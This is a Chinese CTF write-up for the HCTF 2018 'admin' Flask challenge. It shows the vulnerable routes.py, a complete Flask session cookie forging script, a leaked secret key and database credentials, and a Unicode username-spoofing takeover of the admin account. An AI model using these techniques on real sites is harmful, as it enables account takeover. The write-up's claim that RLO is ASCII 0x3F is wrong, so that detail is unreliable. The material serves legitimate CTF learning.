[HCTF 2018]admin
知识点
FLASK
- flask是把session存在客户端的,也就是存储在本地,而且flask只经过 base64编码和用密钥签名,虽然没有签名不可以伪造session,但是有很多信息我们可以直接从session解码找出来。
- 路由是将URL直接映射到创建网页的代码的机制。它有助于更好地管理网页的结构,并显着提高网站的性能,并且进一步的增强或修改将变得非常简单。在python中,路由是在大多数网络框架中实现的。
- Flask路由
Flask中的route()装饰器用于将URL绑定到函数。当在浏览器中访问对应URL时,将执行该函数以给出结果。 - 使用URL变量
我们可以使用路由传递URL变量以动态构建URL。使用url_for()函数,该函数将函数名称作为第一个参数,并将其余参数作为URL规则的可变部分。 - 重定向
可以使用重定向功能通过路由将用户重定向到另一个URL。提到了新的URL作为函数的返回值,该函数应该重定向用户。当我们在修改网页的一些问题时,将用户暂时转移到其他页面时,这很有用。
Unicode反转字符利用
- Unicode:控制字符是RLO,ASCII码是 0x3F。只要在一行字符前面加上一个0x3F就可以实现文本的反向排列。这个0x3F是Unicode为了兼容阿拉伯文字从左至右的阅读习惯设计的一个转义字符。
nodeprep是从twisted模块中导入的,利用nodeprep.prepare函数会将unicode字符转换。例如利用nodeprep.prepare函数会将unicode字符ᴬ转换成A,而A再调用一次nodeprep.prepare函数会把A转换成a。
思路
![【CTF】buuctf web(五)——[HCTF 2018]admin——flask session伪造+Unicode欺骗](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230809/e3541d2cd8a94a2f86591f54514347cf.png)
![【CTF】buuctf web(五)——[HCTF 2018]admin——flask session伪造+Unicode欺骗](https://www.johngo689.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
![【CTF】buuctf web(五)——[HCTF 2018]admin——flask session伪造+Unicode欺骗](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230809/36e02c4d81494ad39c0aee964321bd58.png)
下面这就算是登进来了
![【CTF】buuctf web(五)——[HCTF 2018]admin——flask session伪造+Unicode欺骗](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230809/8942320010ad45f7a5cba578f354e04c.png)
查看源码
![【CTF】buuctf web(五)——[HCTF 2018]admin——flask session伪造+Unicode欺骗](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230809/11144b25a7c54fee8be5afec88eb1dc1.png)
提示you are not admin,可能需要登录admin才能获取我们想要的东西
试一下弱口令,用户名 admin,密码 123
![【CTF】buuctf web(五)——[HCTF 2018]admin——flask session伪造+Unicode欺骗](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230809/c2f0d504c56b4e3a8fe04ad3ce3218ee.png)
好,上面是插叙,下面才是正常解法
![【CTF】buuctf web(五)——[HCTF 2018]admin——flask session伪造+Unicode欺骗](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230809/e0c4fbe60bea4e759d9fdaeebaf3e7ed.png)
登录后有四个选项
点击post
![【CTF】buuctf web(五)——[HCTF 2018]admin——flask session伪造+Unicode欺骗](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230809/7da4733b529b481d8c929b80478ac107.png)
下一个选项change password
发现change源码中有一个地址
![【CTF】buuctf web(五)——[HCTF 2018]admin——flask session伪造+Unicode欺骗](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230809/9e460a26e0874faba4c49fb4cbe02e30.png)
访问一下发现提供了网页的源码,是一个flask项目
![【CTF】buuctf web(五)——[HCTF 2018]admin——flask session伪造+Unicode欺骗](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230809/befb08fd57724f33aa644e12bdbe3ef8.png)
在APP目录里找到
routes.py路由文件
from flask import Flask, render_template, url_for, flash, request, redirect, session, make_response
from flask_login import logout_user, LoginManager, current_user, login_user
from app import app, db
from config import Config
from app.models import User
from forms import RegisterForm, LoginForm, NewpasswordForm
from twisted.words.protocols.jabber.xmpp_stringprep import nodeprep
from io import BytesIO
from code import get_verify_code
@app.route('/code')
def get_code():
image, code = get_verify_code()
buf = BytesIO()
image.save(buf, 'jpeg')
buf_str = buf.getvalue()
response = make_response(buf_str)
response.headers['Content-Type'] = 'image/gif'
session['image'] = code
return response
@app.route('/')
@app.route('/index')
def index():
return render_template('index.html', title = 'hctf')
@app.route('/register', methods = ['GET', 'POST'])
def register():
if current_user.is_authenticated:
return redirect(url_for('index'))
form = RegisterForm()
if request.method == 'POST':
name = strlower(form.username.data)
if session.get('image').lower() != form.verify_code.data.lower():
flash('Wrong verify code.')
return render_template('register.html', title = 'register', form=form)
if User.query.filter_by(username = name).first():
flash('The username has been registered')
return redirect(url_for('register'))
user = User(username=name)
user.set_password(form.password.data)
db.session.add(user)
db.session.commit()
flash('register successful')
return redirect(url_for('login'))
return render_template('register.html', title = 'register', form = form)
@app.route('/login', methods = ['GET', 'POST'])
def login():
if current_user.is_authenticated:
return redirect(url_for('index'))
form = LoginForm()
if request.method == 'POST':
name = strlower(form.username.data)
session['name'] = name
user = User.query.filter_by(username=name).first()
if user is None or not user.check_password(form.password.data):
flash('Invalid username or password')
return redirect(url_for('login'))
login_user(user, remember=form.remember_me.data)
return redirect(url_for('index'))
return render_template('login.html', title = 'login', form = form)
@app.route('/logout')
def logout():
logout_user()
return redirect('/index')
@app.route('/change', methods = ['GET', 'POST'])
def change():
if not current_user.is_authenticated:
return redirect(url_for('login'))
form = NewpasswordForm()
if request.method == 'POST':
name = strlower(session['name'])
user = User.query.filter_by(username=name).first()
user.set_password(form.newpassword.data)
db.session.commit()
flash('change successful')
return redirect(url_for('index'))
return render_template('change.html', title = 'change', form = form)
@app.route('/edit', methods = ['GET', 'POST'])
def edit():
if request.method == 'POST':
flash('post successful')
return redirect(url_for('index'))
return render_template('edit.html', title = 'edit')
@app.errorhandler(404)
def page_not_found(error):
title = unicode(error)
message = error.description
return render_template('errors.html', title=title, message=message)
def strlower(username):
username = nodeprep.prepare(username)
return username
然后我就没什么思路了,下面看一下大佬们的解题方法
解题方法
方法一:flask session伪造
flask中session是存储在客户端cookie中的,也就是存储在本地。flask仅仅对数据进行了签名。众所周知的是,签名的作用是防篡改,而无法防止被读取。而flask并没有提供加密操作,所以其session的全部内容都是可以在客户端读取的,这就可能造成一些安全问题。
具体方法:
首先通过脚本将session解密
""" Flask Session Cookie Decoder/Encoder """
__author__ = 'Wilson Sumanang, Alexandre ZANNI'
import sys
import zlib
from itsdangerous import base64_decode
import ast
if sys.version_info[0] < 3:
raise Exception('Must be using at least Python 3')
elif sys.version_info[0] == 3 and sys.version_info[1] < 4:
from abc import ABCMeta, abstractmethod
else:
from abc import ABC, abstractmethod
import argparse
from flask.sessions import SecureCookieSessionInterface
class MockApp(object):
def __init__(self, secret_key):
self.secret_key = secret_key
if sys.version_info[0] == 3 and sys.version_info[1] < 4:
class FSCM(metaclass=ABCMeta):
def encode(secret_key, session_cookie_structure):
""" Encode a Flask session cookie """
try:
app = MockApp(secret_key)
session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
si = SecureCookieSessionInterface()
s = si.get_signing_serializer(app)
return s.dumps(session_cookie_structure)
except Exception as e:
return "[Encoding error] {}".format(e)
raise e
def decode(session_cookie_value, secret_key=None):
""" Decode a Flask cookie """
try:
if(secret_key==None):
compressed = False
payload = session_cookie_value
if payload.startswith('.'):
compressed = True
payload = payload[1:]
data = payload.split(".")[0]
data = base64_decode(data)
if compressed:
data = zlib.decompress(data)
return data
else:
app = MockApp(secret_key)
si = SecureCookieSessionInterface()
s = si.get_signing_serializer(app)
return s.loads(session_cookie_value)
except Exception as e:
return "[Decoding error] {}".format(e)
raise e
else:
class FSCM(ABC):
def encode(secret_key, session_cookie_structure):
""" Encode a Flask session cookie """
try:
app = MockApp(secret_key)
session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
si = SecureCookieSessionInterface()
s = si.get_signing_serializer(app)
return s.dumps(session_cookie_structure)
except Exception as e:
return "[Encoding error] {}".format(e)
raise e
def decode(session_cookie_value, secret_key=None):
""" Decode a Flask cookie """
try:
if(secret_key==None):
compressed = False
payload = session_cookie_value
if payload.startswith('.'):
compressed = True
payload = payload[1:]
data = payload.split(".")[0]
data = base64_decode(data)
if compressed:
data = zlib.decompress(data)
return data
else:
app = MockApp(secret_key)
si = SecureCookieSessionInterface()
s = si.get_signing_serializer(app)
return s.loads(session_cookie_value)
except Exception as e:
return "[Decoding error] {}".format(e)
raise e
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description='Flask Session Cookie Decoder/Encoder',
epilog="Author : Wilson Sumanang, Alexandre ZANNI")
subparsers = parser.add_subparsers(help='sub-command help', dest='subcommand')
parser_encode = subparsers.add_parser('encode', help='encode')
parser_encode.add_argument('-s', '--secret-key', metavar='',
help='Secret key', required=True)
parser_encode.add_argument('-t', '--cookie-structure', metavar='',
help='Session cookie structure', required=True)
parser_decode = subparsers.add_parser('decode', help='decode')
parser_decode.add_argument('-s', '--secret-key', metavar='',
help='Secret key', required=False)
parser_decode.add_argument('-c', '--cookie-value', metavar='',
help='Session cookie value', required=True)
args = parser.parse_args()
if(args.subcommand == 'encode'):
if(args.secret_key is not None and args.cookie_structure is not None):
print(FSCM.encode(args.secret_key, args.cookie_structure))
elif(args.subcommand == 'decode'):
if(args.secret_key is not None and args.cookie_value is not None):
print(FSCM.decode(args.cookie_value,args.secret_key))
elif(args.cookie_value is not None):
print(FSCM.decode(args.cookie_value))
加密伪造生成自己想要的session,需要知道SECRET_KEY,我们找到有关secret_key的目录,发现在config.py里面
import os
class Config(object):
SECRET_KEY = os.environ.get('SECRET_KEY') or 'ckj123'
SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://root:adsl1234@db:3306/test'
SQLALCHEMY_TRACK_MODIFICATIONS = True
方法二:unicode欺骗
- unicode转换字符网站:https://unicode-table.com/en/blocks/
- 代码审计:这里重点要注意以下
strlower()函数,其中调用nodeprep.prepare函数,在代码开头有一行代码:from twisted.words.protocols.jabber.xmpp_stringprep import nodeprep,说明nodeprep是从twisted模块中导入的,利用nodeprep.prepare函数会将unicode字符ᴬ转换成A,而A在调用一次nodeprep.prepare函数会把A转换成a。而值得注意的是strlower()自定义函数被调用了三次,分别是register、login、change,即注册、登陆、修改密码时都会被调用。 - 思路:用
ᴬdmin注册,后台代码就会调用一次nodeprep.prepare函数,把用户名转换成Admin;修改一次密码,再次调用nodeprep.prepare函数,使用户名由Admin转换为admin,重新登陆,就可以得到flag
![【CTF】buuctf web(五)——[HCTF 2018]admin——flask session伪造+Unicode欺骗](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230809/d1461ea8cf2a475092da1bc493e00c67.png)
登陆
![【CTF】buuctf web(五)——[HCTF 2018]admin——flask session伪造+Unicode欺骗](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230809/960f6dec9244445a9831c0de5d47ceaa.png)
进入之后自动将
ᴬdmin转换为 Admin然后修改密码重新登陆
![【CTF】buuctf web(五)——[HCTF 2018]admin——flask session伪造+Unicode欺骗](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230809/cdb61e31a88b48dc9ba0594f7bb54e02.png)
![【CTF】buuctf web(五)——[HCTF 2018]admin——flask session伪造+Unicode欺骗](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230809/df2c51a43f31425fbe01366557ecd8a1.png)
; 总结思路
其实这里统一的目标就是 欺骗服务器本人就是admin用户
参考文章
参考链接:https://blog.csdn.net/weixin_44677409/article/details/100733581
参考链接:https://www.jianshu.com/p/f92311564ad0
参考链接:https://www.cnblogs.com/zaqzzz/p/10243961.html
Original: https://blog.csdn.net/m0_52923241/article/details/119577219
Author: 吃_早餐
Title: 【CTF】buuctf web(五)——[HCTF 2018]admin——flask session伪造+Unicode欺骗
原创文章受到原创版权保护。转载请注明出处:https://www.johngo689.com/749313/
转载文章受原作者版权保护。转载请注明原作者出处!